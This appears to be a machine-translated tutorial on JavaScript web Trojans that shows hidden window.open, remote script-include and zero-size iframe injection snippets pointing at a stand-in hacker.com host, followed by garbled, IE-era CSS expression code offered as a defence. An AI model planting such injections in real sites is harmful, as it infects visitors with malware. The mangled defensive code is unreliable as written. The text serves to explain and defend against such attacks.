Cybersecurity skills: Fight back the endless JS Trojans

IFRAME has a relatively early Trojan connection, and there are many preventive measures. Using CSS with JS scripts is the mainstream method. But this prevention method also has security risks, and JS scripts can also be used to mount Trojans, which is hard to prevent. Next, we will introduce how to fight back against JS Trojans.
JS Trojan Tracing

When IFRAME is gradually abused by hackers, experienced security engineers also began to study the corresponding countermeasures, and various methods to prevent IFRAME from Trojans emerged over a period of time, among them, CSS and JS scripts are used to defend against IFRAME Trojans.
Hackers also found that many websites allow webpages to call JS scripts to implement advertisements and many other special effects. If Trojans are mounted in JS scripts, all the web pages that call this JS script are equivalent to Trojans. hackers who need bots once and for all, so the JS script Trojan is gradually applied by hackers.
Encyclopedia: JavaScript script is short for JavaScript scripting language. It is an object-oriented scripting language and is widely used in dynamic web page programming. It should be noted that JavaScript and Java have some similarities in syntax and can all be used as Web programming languages. They are completely irrelevant. JavaScript is also different from Jscript. Jscript is a scripting language launched by Microsoft to combat JavaScript.
Although JavaScript is promoted to the public as a scripting language for non-programmers, JavaScript is a language with rich features and has the same complexity as other programming languages. In fact, you must have a solid understanding of JavaScript to use it to compile complicated programs. As a security engineer, mastering JS scripts will be of great help in your work.

Principle of Trojan horse mounting
For hackers, The JS script has many advantages. First, the JS script can directly write the JS Code on the webpage or inject it into the webpage, allows the website to remotely retrieve remote JS scripts. In addition, there are dozens of methods for JS Trojan Horse insertion into web pages, which is absolutely dazzling for cainiao, and there is no way to identify where the trojan is.
Compared with security engineers, IFRAME marathon is like a hacker wearing a bright red coat, which is easy to detect. However, using JS to mount Trojans means that the robbers have a face that can be changed at any time, and they can change their clothes at any time. During a search by a security engineer, such a hacker may easily pass through the attack, resulting in endless Trojans.

JS Trojan Attack and Defense recording

Currently, the most common method for JS Trojans is to write JavaScript script code directly on a webpage. When a visitor browses the webpage, malicious trojan scripts will quietly open the Web horse window through the user's browser and run it in a hidden manner.

The key code used in this method is as follows:
Window. open ("http://www.hacker.com/trojan .html", "", "toolbar = no, location = no, directories = no, status = no, menubar = no, scro llbars = no, width = 1, height = 1 ");
This code is often very long and can be easily discovered by security engineers. inexperienced hackers also like to set the "width" and "height =" parameters to "0 ", however, if it is set to 0, malicious code may not run.

Another method for JS Trojan mounting is that the hacker first adds the trojan script code "document. write (<Iframe src = "webpage Trojan address"> </iframe>) ", save the WordPad in Windows as the suffix. js script file and upload it to your designated URL. In this case, the hacker only needs to write the following information to the victim's website:
<Script src = "http://www.hacker.com/wooden horse and feet. js"> </script>
Or
Document. write ("<div style = display: none> ")
Document. write ("<iframe src =" webpage Trojan address "width =" 0 "height =" 0 "scrolling =" no "frameborder =" 0 "> </iframe> ")
Document. write ("</div> ")
The trojan is successfully mounted to the webpage of the other party.

TIPS: hackers can also randomly change the inserted JS Trojan method based on the actual situation. For example, a hacker may write the script as: <div style = "behaviour: url (http://www.hacker.com/wooden horse script .js ); "> or <iframe src =" vbscript: [Trojan script] ">.
Defense against the first JS Trojan method is inconvenient and rarely used, while the second JS Trojan method is currently the mainstream, So we mainly defend against it. The method is to block the JS script of the Remote external domain requested by Src. The Code is as follows:
Iframe {mdy1: expression (this. src = about: blank, this. outerHTML = );}
Script {mzm2: expression (this. src. toLowerCase (). indexOf (http) = 0 )? Document. write (Trojan is isolated successfully !) :);}
However, the disadvantage of this method is that website visitors will not be able to see the webpage related to the infected JavaScript Trojan.

Therefore, we provide security engineers with a piece of CSS code that can stop JS scripts. This code will enable JS files in different regions to use document. when you write. close () force close. At this time, the JS Trojan content is often not ready to be written, and only some of the content after the Writer is forcibly output will not be written into the visitor's computer, this prevents JS scripts from Trojans.
<Title> CSS code that suspends a JS Trojan </title>
<Style type = "text/css" id = "shudoo">
/* <! [CDATA [*/
Iframe {mdy1: expression (this. src = about: blank, this. outerHTML = );}
Script {mzm2: expression (this. src. indexOf (http) = 0 )? Document. close ():);}
/*]> */
</Style>

Although we can cleverly use CSS code to prevent IFRAME and JS script Trojans, why are there endless trojans on webpages? I am afraid I will talk about CSS Trojans. We will discuss them in detail next time.